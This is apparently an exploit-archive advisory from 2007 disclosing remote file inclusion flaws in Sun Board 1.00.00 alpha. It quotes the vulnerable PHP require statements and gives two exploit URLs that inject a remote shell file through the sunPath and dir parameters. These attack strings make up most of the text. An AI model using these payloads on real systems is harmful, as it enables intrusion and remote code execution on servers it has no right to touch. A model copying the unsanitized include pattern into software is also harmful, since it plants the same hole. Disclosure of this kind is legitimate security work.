Sun Board 1.00.00 alpha Remote File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Sun Board 1.00.00 alpha Remote File Inclusion Vulnerabilities
# Published : 2007-06-22
# Author : GoLd_M
# Previous Title : Powl 0.94 (htmledit.php) Remote File Inclusion Vulnerability
# Next Title : NetClassifieds (SQL/XSS/Full Path) Multiple Remote Vulnerabilities

# Sun Board 1.00.00 Alpha Multiple Remote File Inclusion Vulnerabilities

# D.Script :
      http://mesh.dl.sourceforge.net/sourceforge/sunboard/sunboard.zip

# V.Code :
      require $sunPath.'config.php';
      require_once $sunPath.'dbms/'.$dbtype.'.php';
# In :
      /include.php

# Exploits :
      /include.php?sunPath=Shell.txt?

# V.Code 2 :
      <?php require_once $dir.'/lib.php'; ?>

# In :
      /skin/board/default/doctype.php

# Exploits 2 :
      /skin/board/default/doctype.php?dir=Shell.txt?

# Discovered by:
      GoLd_M = [Mahmood_ali]

# Homepage:
      http://www.Tryag.Com/cc

# Sp.Thanx To :
      Tryag-Team & Asb-May's Group

# www.Syue.com [2007-06-22]